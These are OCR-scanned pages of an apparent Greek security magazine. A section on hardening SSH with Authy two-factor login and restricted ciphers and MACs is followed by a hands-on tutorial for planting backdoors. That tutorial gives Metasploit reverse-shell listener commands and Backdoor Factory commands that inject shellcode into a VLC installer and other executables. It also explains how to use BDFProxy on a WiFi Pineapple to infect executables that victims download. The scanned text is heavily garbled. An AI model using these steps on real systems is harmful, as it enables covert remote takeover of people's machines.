Ката την εκτἐλεσή του, το окрїптак! θα µας απευθύνει δύο σημµαντικὲς ερωτήσεις. 
H πρώτη αφορά στο API key. Προφανώς, εδὠ πρέπει να δώσουμε τη συμβολοσειρά 
που πήραμε OTav ολοκληρώσαμε τη δηµιουργία της εφαρμογῆς µας στο Authy. H 
δεύτερη ερώτηση αφορά στο ενδεχόμενο ката το οποίο η υπηρεσία Authy δεν λει- 
Toupyei: Τι θέλουμε να γίνεται σε αυτὲς τις περιπτώσεις; Εμεὶς επιλέξαμε την απε- 
vepyonoinon του ελέγχου µε TO authentication token, για να εἰμαστε ἠσυχοι. Δεν θα 
θέλαμε να κλειδωθούμε ἐξω апо το μηχάνημα αν κάποια στιγμὴ τεθεἰ εκτὸς λειτουρ- 
үіас̧ η υπηρεσία ἡ αν το ἰδιο κλείσει. Απαντώντας και σ' αυτή την ερὠτηση, το script 
θα πραγματοποιήσει τις απαραίτητες ρυθμίσεις εντὀς του sshd_config, θα εμφανίσει 
μερικές απλὲς οδηγίες χρήσης και θα τερματιστεί. Тора πρέπει να το ξανατρέξου- 
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με, µε σκοπὀ να ενεργοποιἠήσουµε τη συσκευἠ µας ως Eva αποδεκτὀὸ authentication 
token. Αυτό γίνεται πανεύκολα δίνοντας кат! τέτοιο: 


$ sudo /usr/local/bin/authy-ssh enable <username> <email> <country code> 
<number> 


Στη θέση του username δίνουμε TO буора χρήστη για τον опоіо BEAOUHE va ενερ- 
γοποιήσουμε την προστασία µε το authentication token, ενώ στη θέση του email 
εισαγάγουµε το λογαριασμὀ που δώσαμε отау εγκαταστήσαμε το Authy στο κινητὀ 
μας. Εμείς, για παράδειγµα, εκτελέσαµε το script ως εξής: 


$ sudo /usr/local/bin/authy-ssh enable pvar pvar@xxxxxxxx.gr 30 б9хххххх87 


Auto ñTav ὀλο :D Αν κάνουμε και µια επανεκκίνηση της υπηρεσίας SSH, σε κάθε 
σύνδεση ο server θα ελέγχει διπλά την ταυτότητά µας: Θα ζητά To password ἡ θα 
τσεκάρει τα εγκατεστημένα δημόσια κλειδιά (ανάλογα µε τη ρύθμιση που έχουμε 
κάνει) και στη συνέχεια θα ζητά να εισάγουµε ἑναν "φρέσκο" αριθμὸ апо το Auhty. 
H σὐνδεσὴ µας στο σύστημα θα πραγματοποιείται μόνο όταν και οι δύο ἐλεγχοι εἶναι 
πετυχημένοι. Πριν προχωρήσουμε, αξίζει να πούμε δυο λόγια για την "εφαρμογή" 
που δημιουργήσαμε νωρίτερα. Σκεφτείτε ὁτι το Authy έχει δημιουργηθεί για εταιρικἠ 
χρήση κι ὀχι για προσωπική. Ας υποθέσουμε, λοιπὀν, бт! ἐχει εγκατασταθεἰ σε NOA- 
Aouc SSH servers, στους οποίους συνδέονται πολλοί και διαφορετικοί χρήστες. Σε 
αυτἠ την περίπτωση δεν θα θέλαμε οι αριθμοί που λαμβάνει κἆθε χρήστης να γἰνο- 
ута! αποδεκτοί ano κάθε SSH server. Με άλλα λόγια, θα θέλαμε κάθε εγκατάσταση 
του Auhty σε κἄποιο μηχάνημα να λειτουργεἰ αυτόνομα κι ανεξάρτητα апо Tic ἄλλες. 
Н ὑπαρξη των "εφαρμογών" εξυπηρετεἰ ακριβώς σε αυτή τη διαχειριστικἠ ανάγκη. 


pvar@dhvnet-debian: ~ 
File Edit View Search Terminal Help 
2. Don't allow logins until api.authy.com is back 


type 


1 or 2 to select the option: 1 
гапа Та кел - 
For 


enable two-factor authentication on your account type the following command: 


sudo /usr/local/bin/authy-ssh enable pvar <your-email> <your-numeric-country-code> <your-cellphone> 
Example: sudo ./authy-ssh enable pvar myuser@example.com 1 401-390-9987 


To enable two-factor authentication on user account type: 


sudo /usr/local/bin/authy-ssh enable <local-username> <user-email> <user-cellphone-country-code> <иѕег-се11 
phone> 


To uninstall Authy SSH type: 
sudo /usr/local/bin/authy-ssh uninstall 
H server to appl 
pvar@dhvnet -debian:~$|sudo /usr/local/bin/authy-ssh enable pvar pvar@@ 
Username: pvar 


Cellphone: (+30) 697247737 
Email: pvar@@ едг 


Do you want to enable this user? (y/n) у 4------ 
User was registered 
pvar@dhvnet -debian:~$ 


Αφού εγκαταστήσουµε το Аи у οφείλουμε να "EVEPYONOINOOULE" ка! TO 
smartphone που θέλουμε να µετατρέψουμµε σε authentication token. 
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pvar@dhvnet-debian: ~ 


H σύνδεση σε капогоу server, στον οποίο έχουμε ενεργοποιήσει την 
ταυτοποίηση του χρήστη µε τη βοήθεια ενὀς ζεύγους δηµόσιου-ιδιωτι- 
кош κλειδιού. Στον ἰδιο server έχουμε εγκαταστήσει και το Authy. Έτσι, 
αφού δώσουμε то passphrase για να επιτρέψουμε τη χρήση TOU ιδιωτι- 
кой κλειδιού, ζητάμε апо το Authy να µας στείλει Eva SMS και δίνουμε 
στο σύστημα τον αριθµὀ που βρίσκουμε εντὸς του μηνύματος. Περισσὀ- 
τερη ασφάλεια δεν EXOUV OUTE στα γραφεία των μυστικών υπηρεσιών, 
στις ταινίες ;) 


Περισσότεροι αλγόριθμοι 


ΟΦφεἰλουµε να οµολογήσουμε бт! -yia εμάς τουλάχιστον- η παρουσίαση του Authy 
αποτέλεσε Eva ευχάριστο διάλλειμα апо τις ρυθμίσεις του SSH και τις μονότονες 
συζητήσεις για τους αλγόριθμους κρυπτογράφησης. Ωστόσο, προκειµένου να ολο- 
κληρώσουμε την εργασἰα µας και να μπορούμε να πούμε Оті οι συνδέσεις µας δεν 
στηρἰζονται σε κανέναν (αποδεδειγμένα) ευπαθὴ αλγόριθμο, μένουν δύο ακόμα 
ρυθμίσεις. 


Σε µία σύνδεση SSH, τα δεδοµένα που διακινούνται προφυλάσσονται µε ἑναν αλγό- 
ριθµο συμμετρικἠς κρυπτογράφησης. То NWG προκύπτει το σχετικὀ κλειδὶ κρυπτο- 
γράφησης το εξετάσαµε νωρίτερα. Απομένει να δούµε ποιοι αλγόριθμοι συμμετρικἠς 
κρυπτογράφησης υποστηρίζονται και να επιλέξουμε εκείνους για τους οποίους δεν 
έχει βρεθεἰ καμία πετυχημένη επίθεση. Ката τα γνωστά, μπορούμε να ανατρέξουµε 
στο man page του ssh_config (σελἰδα πέντε κι ενότητα cipher). Апо τη λίστα nou θα 
βρούμε στο man page, οι μόνοι αλγόριθμοι στους οποίους μπορούμε να στηριχτού- 
µε εἶναι οι chacha20 και οι διάφορες παραλλαγὲς του AES. Επομένως, θα πρέπει va 
ανοἰξουµε το sshd_config και va προσθέσουμε στο τέλος του την ακόλουθη γραμμή: 


Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@ 
openssh.com,aes256-ctr,aes192-ctr,aes128-ctr 


Αντίστοιχα, εντὸς Tou ssh_config πρέπει να βρούμε (και пал!) την ενότητα Host * και 
στο τἐλος της να προσθέσουμε την ἴδια ρύθμιση: 
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ΟΙ αλγόριθμοι συμμετρικἠς κρυπτογράφησης пои υποστηρίζει TO OpenSSH. 


Host * 


Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@ 
openssh.com,aes256-ctr,aes192-ctr,aes128-ctr 


Μία ακόµα λειτουργία στην οποία εμπλέκονται αλγόριθμοι κρυπτογράφησης εἶναι n 
πιστοποίηση των δεδομένων. Βλέπετε, σε µια σύνδεση SSH δεν αρκεἰ η προστασία 
ano τα αδιάκριτα μάτια. Εξίσου σηµαντικἠ εἶναι και η εξασφάλιση της "ακεραιότη- 
τας" των δεδομένων. Με апла λόγια, θέλουμε να µη βλέπει κανένας τα μηνύματά 
μας και, επιπρὀσθετα, τα ἴδια τα μηνύματα να µην αλλοιώνονται στο ελάχιστο. Αυτό 
επιτυγχάνεται µε τη βοήθεια ενὸς ειδικού Checksum, που στην περίπτωση των ouv- 
δέσεων SSH ονομάζεται MAC (Message Authentication Code). Αυτὸ το μέγεθος uno- 
pei να παραχθεί µε πολλούς τρόπους. H μέθοδος που ἐχει αποδειχθεἰ ασφαλέστερη 
περιγράφεται ως "Encrypt then MAC" και προβλέπει την παραγωγἠ του MAC ano τα 
κρυπτογραφημένα δεδομένα. Όμως µε ποιον τρὀπο προκύπτει αυτό το МАС; Στην 
περίπτωση του OpenSSH υποστηρίζονται αρκετοἰ αλγόριθμοι γι’ аот τη δουλειά, οι 
οποίοι Eni της ουσίας εἶναι αλγόριθμοι hashing. Όπως αντιλαμβάνεστε, η αποστολἠ 
του MAC εἶναι τέτοια που η ασφάλεια του αλγόριθμου µε τον опоіо προκύπτει δεν 
εἶναι κρίσιμη. Ωστόσο, προσπαθώντας να ρυθµἰσουµε το OpenSSH µε συνέπεια, θα 
καταργήσουμε τη χρήση των αδύναμων αλγορίθμων апо παντού. Ακριβώς γι' αυτὸ, 
θα απενεργοποιἠήσουµε τη χρήση των MD5 και SHA1. Τελικά, εντὸς του sshd_config 
θα προσθέσουμε την ακόλουθη γραμμὴ: 


MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac- 
ripemd160-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac- 
sha2-256,hmac-ripemd160,umac-128@openssh.com 


Ката τα γνωστὰ, μέσα στο ssh_config θα πραγματοποιήσουμε την ακὀλουθη npo- 
σθήκη: 


Host * 


MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac- 
ripemd160-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac- 
sha2-256,hmac-ripemd160,umac-128@openssh.com 
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Πόσο ασφαλείς νιώθετε σήμερα; 


H ερώτηση рпорєі να μοιάζει ανόητη ἡ και ειρωνικἠ, εξαιτίας της λέξης "σήμερα" 
(Σ.τ.Ε. Ἠ και τηε "νιώθετε"). Ката τη γνώμη µας, όμως, η ἰδια λέξη προσδίδει µεγα- 
λύτερη αξία στην ερώτηση. О προσδιορισμὀς του χρονικού πλαισίου εξυπηρετεί ως 
υπενθύμιση: H ασφάλεια δεν επιτυγχάνεται μόνο µε μερικὲς ρυθµἰσεις, бсо σωστὲς 
κι av εἶναι, ὅση μελέτη κι αν ἐχει προηγηθεί. H ασφάλεια προὐποθέτει την napako- 
λούθηση των εξελίξεων και την επαγρύπνηση. O! ρυθμίσεις που παρουσιάσαµε σ' 
αυτό το ἆρθρο αποσκοπούν στην κατάργηση ορισμένων αλγόριθµων κρυπτογράφη- 
σης που εἶναι γνωστὸ οτι ἐχουν σπάσει ἡ ἑστω λυγίσει. Κάποιοι µπορεί να µην ¿xouv 
"ισοπεδωθεἰ" ακόµα, αλλά ἑνας καλὸς διαχειριστής οφείλει να εἶναι *kai* προνοη- 
TIKOG. Φυσικά, κανεὶς δεν µπορεἰ να εγγυηθεί ὁτι οι αλγόριθμοι που επιλέξαμε εἶναι 
απὀλυτα ασφαλείς, οὐτε ὁτι δεν θα σπάσουν ποτὲ. Κάτι τἐτοιο θα μπορούσε να γίνει 
αύριο κιόλας. AUTO πρέπει να το θυμόμαστε πάντα και να µην χαλαρώνουμε ποτὲ - κι 
ὀποιος αντέξει ;) 


Οι συνδυασμοί αλγορίθμων για την πιστοποίηση των µεταδιδό- 
µενων μηνυμάτων. Εδώ η ασφάλεια των αλγορίθμων hashing 
δεν εἰναι κρίσιμη, αλλά κι апо την ἄλλη δεν υπάρχει κανένας 
λόγος να χρησιμοποιούμε ευπαθεἰς αλγόριθμους. 
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Φυτέψτε backdoor, ἄνετα και γρήγορα! 


Οι TEXVIKEG για να προσπεράσουµε την ασφάλεια EVOG συστήµατος εἶναι αμέτρητες. Εμεἰς 
όμως εἰμαστε λίγο ανήσυχα πνεύματα και βρίσκουμε την επίθεση στη "Вітріма" ενὸς 
μηχανήματος βαρετή. Αυτή τη фора, λοιπὸν, θα χρησιμοποιήσουμε την πίσω πόρτα: Ἕνα 


πέρασμα κατασκευασμένο апо εμάς τους ἴδιους, για την αφεντιά µας και μόνο. Γι’ αυτὸ 
και σ' GUTO το арӨро ασχολούμαστε µε το Backdoor Factory. 


Φυτέψτε backdoor, άνετα και γρήγορα! 
Κκκκκκκκκκκκκκκκκκκκ κκ κκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ-κκ-κκ-κο« 


Ὀλο και κάποια φορά θα έχουμε ξεχάσει τα KAEIOIG μέσα στο σπίτι ἡ θα τα έχουμε 
χάσει κἄπου, µε αποτέλεσµα να κλειδωθούμε απέξω. Όταν αντιλαμβανόμαστε τι 
συμβαίνει, το прото πράγμα που κάνουμε εἶναι να σκεφτούμε αν υπάρχει κάποια 
"πίσω порта", кат! σαν κρυφὀ πέρασμα που θα µας οδηγήσει μέσα στο σπίτι χωρίς 
τα κλειδιά. Όπως ξέρουμε, τέτοια περάσματα υπάρχουν και στα συστήματα των 
υπολογιστών κι xouv το περιγραφικὀ ὀνομα "backdoor". Βέβαια, αυτὲς οι "πίσω 
πόρτες" δεν οδηγούν συνήθως στο δικὀ µας σπίτι, αλλά σε κἄποιο ξένο. Εν ολίγοις, 
τα backdoors επιτρέπουν τη µη εξουσιοδοτηµένη πρὀσβαση σ' Eva σύστημα. Εκτε- 
λούνται δε στο παρασκήνιο κι επιστρατεύουν διάφορες τεχνικὲς για να κρύβουν την 
παρουσία τους απὀ τον εκάστοτε "νοικοκύρη". 


Το να δημιουργήσουμε και να εγκαταστήσουµε Eva backdoor απευθείας σε κἄποιο 
σύστημα, δεν εἶναι ὁ,τι πιο εὐκολο. Π' αυτό και στο παρὀν ἆρθρο θα ασχοληθούμε µε 
την κατασκευἠ και την ενσωμάτωση ενὸς backdoor µέσα σε ἄλλο πρὀγραμμα, που 
στη συνέχεια θα φροντίσουμε WOTE να εκτελεστεί στο µηχάνηµα-στόχο. Θα μιλή- 
σουµε συγκεκριµένα για την πλατφόρμα Backdoor Factory (BDF), η onoia αυτομα- 
топо! την προσθήκη κακὀβουλου κὠδικα σε εκτελέσιμα αρχεία. Н ενσωμάτωση TOU 
κὠδικα που συμπεριφἑρεται ως backdoor, πραγματοποιείται µε τεχνικὲς που ανακα- 
λύφθηκαν ano τον ερευνητή Joshua Pitts. Σημειώστε бт! το BDF εἶναι προεγκατε- 
στημένο στις τελευταἰες εκδόσεις TOU Kali Linux, ενώ μπορούμε να το προσθέσουμε 
εὐκολα σε οποιαδήποτε ἄλλη διανομή Linux εκτελώντας τα ακόλουθα: 


$ git clone https://github.com/secretsquirrel/the-backdoor-factory 
$ cd the-backdoor-factory 
$ sudo ./install.sh 


Για τη λειτουργία του Backdoor Factory anaiteital και η παρουσία της Python 2.7, 
όπως επἰσης και της πλατφόρμας του Metasploit. Εμεἰς, πάντως, προτιµήσαμε va 
εργαστούμε στο αγαπημένο µας Kali, ὅπου όλα τα προηγούμενα εἶναι προεγκατε- 
στημένα. Ας δούµε тора μερικὲς επιθέσεις που μπορούμε να εξαπολύσουµε στα τρία 
γνωστὰ λειτουργικἁ συστήματα, µε τη βοήθεια Tou BDF. 


Backdoor στα Windows 


Ας ξεκινήσουμε µε Ta Windows - µε TO πιο δημοφιλὲς λειτουργικὀ σύστημα, δηλα- 
on. Πιο συγκεκριμένα, ας υποθέσουμε бт! TO σύστημα-στόχος τρέχει та Windows 
8.1, µε ὀλες τις τελευταίες ενημερώσεις. Ας υποθέσουμε επἰσης ὁτι, εκτὸς апо το 
Windows Defender, το θύμα δεν χρησιμοποιεί κανένα GAAO αντι-ιικὸὀ πρὀγραμμα. 
Όπως εἰπαμε νωρίτερα, το δικὀ µας σύστημα τρέχει το Kali Linux και βρίσκεται στο 
ἰδιο τοπικὀ δίκτυο μ' εκεἰνο του θύματος. Па να µπορέσουµε να δημιουργήσουμε µια 
σύνδεση (session) µε To backdoor, θα σηκώσουμε ёха“ listener στην πλατφόρμα του 
Metasploit. H epyaoia µας ξεκινά µε την εκτέλεση του ἰδιου του Metasploit: 


root@kali:~# msfconsole -q 


Όπως βλέπετε, εισερχὀµαστε στην κονσόλα της περίφημης πλατφόρμας χρησιµοποι- 
ὠντας την παράμετρο -q (апо το quiet), η οποία απενεργοποιεἰ την εμφάνιση του 
διακοσμητικού ASCII art και των περιττῶν μηνυμάτων. Апо εκεἰ, για να στήσουμε 
και να ξεκινήσουμε τον κατάλληλο listener δίνουμε τα ακόλουθα: 


msf > use exploit/multi/handler 


msf exploit(handler) > 


41 


Y HA@KE 


ANNS 


msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_shell_tcp 

PAYLOAD => windows/meterpreter/reverse_shell_tcp 

msf exploit(handler) > set LHOST 192.168.0.103 

LHOST => 192.168.0.17 

msf exploit(handler) > set LPORT 8080 

LPORT => 443 

msf exploit(handler) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/ 

[*] Starting the payload handler... 
Κατ' αρχάς, KAVOUHE χρήση Tou module exploit/multi/handler και στη συνέχεια επι- 
AEYOUHE WC payload το reverse_shell_tcp. Αμέσως μετά ορἰζουμε τη διεύθυνση IP 
καιτη δικτυακἠ θύρα του δικού µας μηχανήματος, µέσω των παραμέτρων LHOST και 
LPORT αντἰστοιχα. Τέλος, ενεργοποιούµε Tov listener δίνοντας την εντολή exploit. 


Πλέον, µε τη βοήθεια Tou Metasploit, το μηχἀάνημά µας εἶναι ἑτοιμο να δεχτεἰ το ai- 
τηµα σύνδεσης που θα στείλει το backdoor апо το μηχάνημα-στὀχο. 


Εφόσον ο στόχος τρέχει Windows, το backdoor πρέπει να τοποθετηθεἰ σε κάποιο 
εκτελέσιμο αρχείο τύπου ΡΕ (Portable Executable). Με ἆλλα λόγια, το backdoor 
Πρέπει να ενσωµατωθεἰ σε κἀποιο αρχείο EXE ἡ DLL. Εμεἰς επιλέξαμε να χρησι- 


Sat Jan 24, 10:34 ΡΜ 
root@kali: “/Desktop/the-backdoor-factory 


File Edit View Search Terminal Help 
root@kali: # ./backdoor.py -f vlc-2.1.5-win32.exe -H 192.168.0.103 -P 8080 -s reverse_shell_tcp 


Author: Joshua Pitts 
Email: the.midnite.runr[a t]gmail<d o t>com 
@midnite_runr 


shellcode 
ion stub 
l fit the minimum shellcode length of 356 


NALE ЇШЇП 


Όταν εκτελούμε To Backdoor Factory ξεκινά µια ανάλυση του εκάστοτε EKTE- 
λέσιμου αρχείου και εμφανίζονται τα ευρήματα. Επιπρὀσθετα, εµφανίζεται KI о 
ελάχιστος χώρος που απαιτείται για την ενσωμάτωση του επιλεγμένου backdoor. 
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μοποιήσουμε το πρὀγραμμα εγκατάστασης του δημοφιλούς προγράμματος МІС. H 
προσθήκη του κὠδικα апо το BDF πραγματοποιείται σε περιοχές του εκτελέἐσιµου 
που ονομάζονται code caves. Δυστυχώς, ὁμως, αυτὲς οι "φυσαλίδες" στην περιοχἠ 
του κὠδικα των εκτελέσιμων δεν εἶναι πάντοτε επαρκεἰς και δεν μπορούν va φι- 
λοξενήσουν τον κὠδικα του backdoor. Το Backdoor Factory αναλύει το εκάστοτε 
εκτελἑσιµο και προτείνει διάφορες υποψήφιες θέσεις για την τοποθέτηση του KAKO- 
βουλου κὠδικα. Αν δοκιµάσουμε TNV εμφύτευση σε ὀλεςτις προτεινόμενες NEPIOXEG, 
εἶναι σχεδὀν σἰγουρο бт! κἄποιο апо τα προϊόντα των δοκιμών θα λειτουργεἰ σωστά. 
Βέβαια, αν η ατυχἰα µας χτυπήσει κὀκκινο, µπορεἰ να µην προκύψει κανένα λειτουρ- 
γικὸ πρόγραµµα апо τη διαδικασία εμφύτευσης. Σε αυτή την περίπτωση πρέπει va 
δημιουργήσουμε Eva vo code cave. Όμως, ας αφήσουμε τη θεωρητικἠ περιγραφἠ 
κι ας δούμε τον τρόπο εργασίας στην πράξη. 


Για να ξεκινήσουμε την ενσωμάτωση του backdoor ανοίγουμε Eva VEO τερµατικὀ 
και μεταβαΐνουμε στον κατάλογο ὁπου έχουμε εγκαταστήσει TO Backdoor Factory. 
Επειδή το BDF εἶναι γραμμένο σε Python και ката πάσα πιθανότητα δεν θα βρίσκεται 
μέσα στο PATH, το ξεκινάμε ως εξής: 


./backdoor.py -f vlc-2.1.5-win32.exe -H 192.168.0.103 -P 8080 -s reverse_ 
shell_tcp 


root@kali: ~/Desktop/the-backdoor-factory 


File Edit View Search Terminal Help 
Reading win32 entry instructions 
g f setting select hellcode 
ecution stub 
ill fit the minimum shellcode length of 356 
] All caves lengths: (3 
4444444444 44844844: ΜΗΝΑ 
The Το]]ς g caves can be used to inject code and possibly 
continue 
jump, single, append, or ignore.** 
πμ» #### НН ή АННННННННННЫННННННННННННННННННННННННННННННЕ 
1 length as int: 356 


ection Begin: None End: None begin: 
ction Be 


6. Section Name: .rsrc; Section Begi 
жжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжК Жжжж 


Enter your selection: 2 


ection Flags 
initial entry instructions 
win32 resume ution stub 
s lected shellcode 
ble pointer 
“backdoorin lete 
32.exe is in the ed' directory 
` /Desktop/the- -backdoor- -factory# I 


Δεν εἶναι όλα Ta code caves κατάλληλα για την ενσωµάτω- 
ση οποιοδήποτε backdoor. Το BDF, όμως, εμφανίζει μόνο 

q "συμβατά" ка! µας ζητά να επιλέξουμε το επιθυμητό. H 
ενσωμάτωση, εξάλλου, του κακόβουλου кодка διαρκεί 
μόλις λίγα δευτερόλεπτα και το τροποποιημένο εκτελέσιμο 
αποθηκεύεται στον κατάλογο backdoored. 


43 


@KER 


ÁN 


Όπως αντιλαμβάνεστε, η παράμετρος -f (апо To file) χρησιμοποιείται για va δηλώ- 
σουµε το αρχείο στο опоіо θέλουμε να ενσωµατωθεἰ το backdoor. Οι παράμετροι 
-H και -P πραγματοποιούν δύο απλὲς ρυθµμἰσεις στο backdoor που πρὀκειται va £v- 
σωµατωθεἰ. Συγκεκριµένα, καθορίζουν τη διεύθυνση του μηχανἠματὀς µας και τη 
δικτυακἠ θύρα στην οποία αναμένονται συνδέσεις. H παράμετρος -s кадорісє το 
εἶδος Tou backdoor που θέλουμε να ενσωματωθεί. Το Backdoor Factory θα αναλύσει 
το εκτελἑσιµο, θα εντοπἰσει τα διαθέσιµα code caves και θα παρουσιάσει εκεἰνα που 
μοιάζουν ικανὰἁ (апо την Gnown της ἐκτασης) να φιλοξενήσουν τον κακόβουλο KO- 
δικα. Εμεὶς аркі να επιλέξουμε Eva ano τα code caves και να πατήσουμµε Enter. Λίγα 
δευτερόλεπτα μετὰ θα βρούμε το τροποποιημένο εκτελέσιμο μέσα στον κατάλογο 
backdoored. Το μόνο που απομένει εἶναι να στείλουμε το μολυσμένο εκτελέἑσιµο 
στο θύμα και να τον πεἰσουµε να το χρησιμοποιήσει. Όπως καταλαβαίνετε, σε αυτό 
το στάδιο θα χρειαστεί να επιστρατεύσουµε κἀποια μέθοδο κοινωνικἠς µηχανικἠς 
(social engineering), кат! που ξεφεύγει απὀ το Өёна του άρθρου µας. Πάντως, ὀταν 
το θύμα εκτελέσει την τροποποιημένη εκδοχἠ του installer του VLC, αµέσως θα 
εκτελεστεἰ και TO backdoor και θα σπεύσει να συνδεθεί στο μηχἀνημὰ µας. Έτσι, 
στο δικὀ µας σύστημα θα δημιουργηθεἰὶ Eva session του Metasploit, στο onoio θα 
μπορούμε να συνδεθούμε апо το σχετικὀ τερµατικὀ εκτελώντας την EVTOAN shell. 
Με αυτὀν τον τρόπο θα αποκτήσουμε πρὀσβαση στο κἐλυφος(στη γραμμὴ εντολών) 
του "παγιδευμένου" συστήματος. Апо εδὠ και πέρα, οτιδήποτε κάνουμε ανῆκει στο 
στάδιο του λεγόμενου post exploitation ;) 


Κάποια εκτελέσιμα αρχεία ἐχουν ενσωματωμένη προστασία апо την τροποποίηση 
του κὠδικα και η ενσωμάτωση του backdoor δεν θα πετύχει: το εκτελἐσιµο θα πάψει 
να εἶναι λειτουργικὀ. Σε αυτή την περίπτωση, ὁπως και ὅταν δεν υπάρχει αρκετὀὸς 
χώρος για TOV κὠδικα του backdoor, πρέπει να ζητήσουμε апо To Backdoor Factory 
να δημιουργήσει Eva νέο code cave. Αυτὸ γἱνεται πανεύκολα, µε τη βοήθεια της 
παραμέτρου -a: 


./backdoor.py -f psexec.exe -H 192.168.0.103 -P 8080 -s reverse shell tcp 
-8 


Τέλος, αν θέλουμε να μολύνουμε ἑνα σύνολο εκτελἐσιµων αρχείων και OX! ἑνα Euo- 
νωμένο, арке να τα τοποθετήσουμε ὁλα στον ἴδιο κατάλογο. Στη συνέχεια μπορούμε 
να τρέξουμε το BDF αντικαθιστώντας την παράμετρο -f µε την -ᾱ. Προφανώς, στη 
θέση του ονόματος TOU εκτελἐσιμου αρχείου θα δώσουμε TO буора του καταλόγου: 


./backdoor.py -d dir_with_executables/ -H 192.168.0.103 -P 8080 -s 
reverse_shell_tcp -ᾱ 


Backdoor για OS X και Linux 


Στην περίπτωση που το σύστημα-στόχος τρέχει κάποια διανομὴ Linux ἡ To λειτουρ- 
γικὀ της Apple, η διαδικασία εἶναι πανομοιότυπη: Δημιουργούμε ἑναν listener µε то 
Metasploit στο δικὀ µας σύστημα κι ενσωματώνουμε TO backdoor σε κἀποιο EKTEAEOI- 
ро αρχείο. Στην περἰπτωση του OS X, τα εκτελἑσιµα αρχεἰα που μπορούμε να χρησιµο- 
ποιήσουμε εἶναι τύπου Mach-O. Σε αυτά τα αρχεία το Backdoor Factory απομακρύνει 
την "υπογραφή γνησιότητας" του κὠδικα (code signature) και προσθέτει τον κακὀ- 
βουλο κώδικα ακριβώς πριν апо τον κὠδικα του εκτελἐσιµου. Με αυτόν τον τρόπο, 
то backdoor εκτελείται πριν апо οποιονδήποτε ἐλεγχο του κανονικού προγράµµατος. 
Στην περἰπτωση Tou Linux, το BDF μπορεὶ να εργαστεἰ σε αρχεία ELF στα onoia ens- 
κτείνεται το Code Segment ката 1000 bytes. Exei προστίθεται ο κακόβουλος κὠδικας. 
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Backdoor Factory µε ανανά 


Έχουμε μιλήσει πολλὲς φορὲς για το δικτυακὀ Ανανά (WiFi Pineapple) και η αγάπη 
μας γι’ αυτόν δεν κρύβεται. Στη συνέχεια θα δούμε пос μπορούμε να αυτοματοποι- 
ἠήσουµε την ενσωμάτωση του backdoor σε οποιοδήποτε εκτελέσιμο προσπαθεἰ να 
κατεβάσει το δύσμοιρο θύμα, που EXE! κάνει το λάθος να συνδεθεἰ στον Ανανὰ µας. 
Το εργαλεἰο nou θα αξιοποιήσουμε ү αυτή τη δουλειά -εκτὸς φυσικά апо το BDF-, 
εἶναι то BDF Proxy. Н εγκατἀστασὴ του στο Kali Linux εἶναι πανεύκολη: 


# apt-get update 
# apt-get install bdfproxy 


Το BDF Proxy ελἐγχει ὁλο TO διερχόμενο traffic και στην περίπτωση που εντοπἰ- 
σει κἄποιο εκτελέσιμο αρχείο, το μολύνει σε праүратіко χρόνο µε τη βοήθεια του 
Backdoor Factory! Όπως αντιλαμβάνεστε, το BDF Proxy θα αποτελεί τον προεπιλεγ- 
μένο και επιβεβλημένο proxy για όλους ὁσοι συνδέονται στο WiFi Pineapple. Ἔτσι, 
боо! συνδεδεμένοι χρήστες κάνουν το λάθος να κατεβάσουν κἀποιο εκτελέσιμο ap- 
χείο, θα καταλήξουν να πάρουν Eva μολυσμένο εκτελέσιμο. Κάτι που διευκολύνει 
αυτή την επἰθεση εἶναι το γεγονὸς бт! οι περισσότερες ιστοσελίδες προσφέρουν та 
αρχεία τους χωρίς κρυπτογράφηση. Έτσι, τα ποσοστά επιτυχίας αυτἠς της επίθεσης 
εἶναι ιδιαἰτερα αυξημένα. 


Ls 


root@kali: /etc/bdfproxy 


File Edit View Search Terminal Help 


root@kali: # cd /etc/bdfproxy/ 
root@kali: # ./wpBDF.sh 


OWN the Network 
WITH BDFProxy! 


Pineapple Netmask [ 


H χρήση του WiFi Pineapple διευκολύνει σε μεγάλο βαθμό τις επι- 
θέσεις µε то BDF. AUTO συμβαίνει γιατί συνεργάζεται άψογα µε TO 
BDF Proxy και επιτρέπει TO αυτόματο φύτεμα των backdoors στα 
εκτελέσιμα αρχεία που κατεβάζουν οι χρήστες/υποψήφια θύματα. 
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Evil CorpNet Wifi 


CorpNet Wifi (Improved Karma Attack) 


BackDoor Factory Proxy 
Injecting shellcode into binaries 


H επίθεση nou πραγµατοποιήσαµε µε то WiFi Pineapple πραγματοποιείται και µε τη βοήθεια 
µιας συσκευἠς Android, στην οποία έχουμε εγκαταστήσει то Kali NetHunter. Πρόκειται για 
µια τρομακτική και OXETIKG εὐκολα επίθεση! 


Πριν ξεκινήσει η επίθεση πρέπει να ενεργοποιήσουμετο WiFi Pineapple, να To συνδὲ- 
σουµε µέσω Ethernet στον υπολογιστή µε το Kali Linux και να μοιραστούμε пай του 
τη σὐνδεσή µας στο Internet, µε τη βοήθεια αυτού του script: http://wifipineapple. 
com/wp4.sh. Αμέσως μετά μπορούμε να προχωρήσουμε στη ρύθμιση του BDF Proxy. 
Γ' αυτό το σκοπὀ µεταβαίνουµε στον κατάλογο /etc/bdfproxy κι ανοίγουμε το αρχείο 
(bdfproxy.cfg), µε κἄποιο προγραμματάκι σαν то nano: 


# cd /etc/bdfproxy 

# nano bdfproxy.cfg 
Evtoc Tou αρχείου πρέπει να βρούμε την ενότητα [targets]. Εκεἰ θα συναντήσουμε 
µια υπὀ-ενότητα για κάθε τύπο εκτελέσιµου στον οποίο Hropgi να ενσωµατωθεὶ 
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backdoor. Εμεὶς πρέπει να τροποποιήσουμµε τις ρυθμίσεις που περιλαμβάνει καθεμία 
апо αυτές τις ενότητες και να δώσουμε τη διεύθυνση ІР του μηχανἠματὀς µας, Ka- 
θὼς και τη δικτυακἡ θύρα στην οποία θα περιμένει συνδέσεις το Metasploit. Σηµειώ- 
στε От! για διαφορετικούς τύπους αρχείων θα μπορούσαμε να ορἰσουµε διαφορετικὲς 
